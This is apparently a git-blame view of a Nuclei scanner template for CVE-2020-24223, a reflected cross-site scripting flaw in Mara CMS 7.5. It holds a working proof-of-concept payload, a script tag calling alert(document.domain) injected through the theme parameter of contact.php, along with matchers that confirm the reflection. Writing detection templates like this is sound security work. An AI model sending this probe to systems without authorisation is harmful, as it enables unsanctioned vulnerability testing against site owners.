2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-24223
|
2020-09-01 18:16:14 +00:00
|
|
|
|
|
|
|
info:
|
2022-05-09 16:12:52 +00:00
|
|
|
name: Mara CMS 7.5 - Cross-Site Scripting
|
2020-09-01 18:16:14 +00:00
|
|
|
author: pikpikcu
|
2020-09-01 18:31:57 +00:00
|
|
|
severity: medium
|
2022-05-17 09:18:12 +00:00
|
|
|
description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.
|
2021-08-19 13:15:35 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/48777
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://sourceforge.net/projects/maracms/
|
|
|
|
- https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
|
2022-05-09 16:12:52 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24223
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-24223
|
|
|
|
cwe-id: CWE-79
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:mara_cms_project:mara_cms:*:*:*:*:*:*:*:*
|
|
|
|
epss-score: 0.01034
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2020,mara,xss,edb
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2020-09-01 18:16:14 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2020-09-17 09:58:51 +00:00
|
|
|
- method: GET
|
2020-09-01 18:16:14 +00:00
|
|
|
path:
|
2020-09-04 05:55:13 +00:00
|
|
|
- '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
2020-09-01 18:16:14 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '"><script>alert(document.domain)</script>'
|
2020-12-13 19:24:23 +00:00
|
|
|
part: body
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
2022-05-09 16:12:52 +00:00
|
|
|
part: header
|
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/04
|